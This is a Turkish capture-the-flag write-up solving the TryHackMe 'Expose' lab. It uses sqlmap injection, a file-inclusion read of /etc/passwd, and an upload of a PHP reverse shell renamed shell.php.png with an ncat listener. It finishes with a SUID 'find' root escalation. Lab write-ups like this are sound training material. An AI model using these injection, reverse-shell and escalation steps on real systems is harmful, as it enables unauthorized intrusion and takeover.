Bu yazımda TryHackMe Expose Makine Çözümü sizler için çözeceğim ve paylaşacağım.
- Makine İsmi: Expose
- Zorluk: Başlangıç-Orta
1- İlk olarak nmap taraması ile başlıyorum. Hedef sistemde 21,22,1337,1883 olarak portların açık olduğunu tespit ettim.
2- Gobuster aracılığıyla dizinleri keşfetmeye başlıyorum. /admin olarak dizin buldum ama giriş yapmaya izin vermiyor.
Detaylı taramada admin_101 olarak bir dizin daha keşfettim. Baktığımda girişlerin olduğunu tespit ettim tarayıcıda açıp araştırmaya devam ediyoum.
3- Nikto ile taradığımda da farklı bir şey bulamadım.
4- Firefox Genel > Ağ ayarlarına gidip
Manual Proxy > Vpn ip adresinizi yazıyoruz. Port olarak 8080 olarak ayarlıyoruz tamam diyip çıkıyoruz.
İlginizi çekebilecek yazımız: VPN Kullanırken Dikkat Edilmesi Gerekenler | VPN Rehberi
5- Burpsuite açtık ve Proxy kısmına tıklayıp Proxy settings ayarlarına gidip Edit tıklayıp orasını Firefox ile aynı olmasına dikkat edelim.
Ayarladık ve HTTP history kısmına gelip beklemeye devam ediyoruz.
6- http://makineipadresi:1337/admin_101 kısmına gidip oradaki login kısmına test yapıp login’e tıklıyoruz.
Post kısmına tıkladık ve Request kısmına sağ tık yaptık ve save item yapıyoruz.
7- root kısmına r olarak kaydedip yeni terminal açıyoruz.
8- sqlmap -r r –dump yazıp devam ediyoruz, sorun olursa sqlmap -r r –dbs olarak da devam edebilirsiniz. Biraz uzun sürer gelen aşamalarda Y olarak devam edin.
9- Karşımıza dizin yolları ve md5 bir şifre çıktı onu direkt sqlmap brute force ile kırdım ve şifreyi easytohack olarak tespit ettim.
Alttaki dizinde ise sadece Z harfi ile başlayan bir username ile siteyi açabilirsiniz diye açıklama var. Onu da diğer aşamalarda araştıracağız.
10- http://makineipadresi:1337/file1010111/index.php?file=/etc/passwd config bilgilerine bakıyoruz ve home kullanıcısı içerisinde zeamkish olarak bir kişi olduğunu tespit ettim. 9. aşamaya dönüp /upload/ dizinine gidelim.
11- /upload-cv00101011/index.php şifre kısmına zeamkish yazdık ve girdik. Aşağıdaki shelli indirip ip adresini içindekini kendi vpn adresiniz ve portu 9001 olarak değiştirin.
Daha sonra ncat -lvnp 9001 olarak portu dinlemeye alın.
$ip = ‘127.0.0.1’; // CHANGE THIS
$port = 1234; // CHANGE THIS
Yukarıdaki ip ve port içerisini değiştirin farklı bir şeye ellemeyin. 🙂
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
Shelli shell.php.png olarak yükleyelim.
12- Shell .php olarak kabul etmiyor shelli indirdikten sonra düzenleyin ve farklı kaydet > shell.php.png olarak kaydedin.
Aşağıda tıklayıp açtığınızda ncat içerisine bağlantı gelmesi lazım eğer gelmezse;
http://makineipadresi:1337/file1010111/index.php?file=../upload-cv00101011/upload_thm_1001/shell.php.png olarak gidin ve şifreyi de zeamkish tıkladığınızda ncat içerisine bağlantı gelmiş olması gerekiyor.
13- Direkt olarak bağlantı geldi. Shell aktif olarak çalışıyor.
14- Zeamkish içerisine geçtik ve içerisinde direkt ssh bilgilerini bizle paylaştığını gördük.
kullanıcı adı: zeamkish
şifre: easytohack@123 olarak devam edip ssh bağlanalım.
15-ssh zeamkish@makineipadresi şifreyi de easytohack@123 olarak girip ssh içerisinde yetki yükseltmeye çalışalım.
find / -perm -4000 2>/dev/null yetki yükseltmek için araştırma yapmaya devam ediyorum.
Birçok yöntemle yetki yükseltebiliriz ben find üzerinden ilerleyeceğim internette araştırma yapmaya devam ediyorum.
16- Gtfobins üzerinden araştırma yapıyorum ve direkt yetki yükseltmeye başlıyorum.
17- find . -exec /bin/sh -p \; -quit yapıyoruz ve direkt root içerisindeyiz.
id yapıp kontrol ettiğimde root içerisinde olduğumuzu görüyoruz.
cat /root/flag.txt
cat /home/zeamkish/flag.txt iki bayrağıda alıyoruz ve TryHackMe Expose Makine Çözümü sonuna geldik.